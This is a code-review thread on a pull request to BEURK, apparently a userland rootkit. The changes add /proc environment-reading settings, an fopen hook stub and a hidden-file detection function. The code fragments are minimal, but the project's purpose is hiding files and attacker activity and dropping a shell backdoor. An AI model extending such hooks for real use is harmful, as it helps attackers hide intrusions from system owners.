### PR TITLE
Add some hooks, file detection and huge reformat

### PR DESCRIPTION
**Pull request by ghost**

### CODE REVIEW

**Comment by nil0x42** [comment]
please consider implementing unit tests on `/tests/core/hooks` as requested by developer's guide,
for all of the newly imlemented hooks

File: beurk.conf [hunk 1]
```diff
@@ -62,3 +62,12 @@ _ENV_XTERM =        TERM=xterm
...
 _WTMP_FILE = /var/log/wtmp
+
+# str: path to processes
+PROC_PATH = /proc/
+
+# str: format string for proc/env
+ENV_LINE = %s/environ
+
+# int: maximal length of our strings
+MAX_LEN = 4125
```
Comment (nil0x42) [inline beurk.conf]: why that size specifically ?

Comment (nil0x42) [inline beurk.conf:73]: why that size specifically ?

azazel uses this value, but before using it as a generic macro on the whole program, i d like to know exactly why this specific value.
i needed it too on drop_shell_backdoor.c, so for the moment i use a local `SLOOP_BUF_SIZE` on line 94 of the file.

we need to discuss about it

File: src/hooks/fopen.c [hunk 2]
```diff
@@ -0,0 +1,40 @@
...
+ * You should have received a copy of the GNU General Public License
+ * along with BEURK.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+#include <errno.h> /* errno, ENOENT */
+#include "beurk.h" /* DEBUG(), is_attacker(), is_hidden_file() */
+#include "config.h" /* REAL_FOPEN() */
+#include "hooks.h" /* prototype, FILE */
+
+// TODO: is_procnet()
```
Comment (nil0x42) [inline src/hooks/fopen.c:26]: please add a card on trello, or some relevant way to remember to add is_procnet().
another way to remember to do it is to request the api function ven if it still does not exists.

File: src/is_hidden_file.c [hunk 3]
```diff
@@ -0,0 +1,58 @@
...
+ * along with BEURK.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+#include <sys/stat.h> /* struct stat */
+#include <string.h> /* strstr() */
+#include <limits.h> /* PATH_MAX */
+#include "beurk.h" /* DEBUG(),  prototype */
+#include "config.h" /* FILE, MAX_LEN, MAGIC_STRING, LIBRARY_NAME, ... */
+
+int         is_hidden_file(const char *path) {
```
Comment (nil0x42) [inline src/is_hidden_file.c:33]: can you please leave a descriptive coment of what this internal API function actually does ?

**Comment by ghost** [comment]
Tests will be done today. I'll add some comments about the internal API too. As for the length, it's a value big enough to ensure reading of all characters in one go, at least here. But I should rework that parsing one day, there's a (very) small chance of failing to detect a hidden file with it right now.

**Comment by nil0x42** [comment]
my question about the size was `why 4125 and not 4126 or 4124, is there  reflexion or valid reason for not using 4096 ?`.
I m very curious about it, so i'd like us to demistify if there is an hidden reason

**Pull request merged**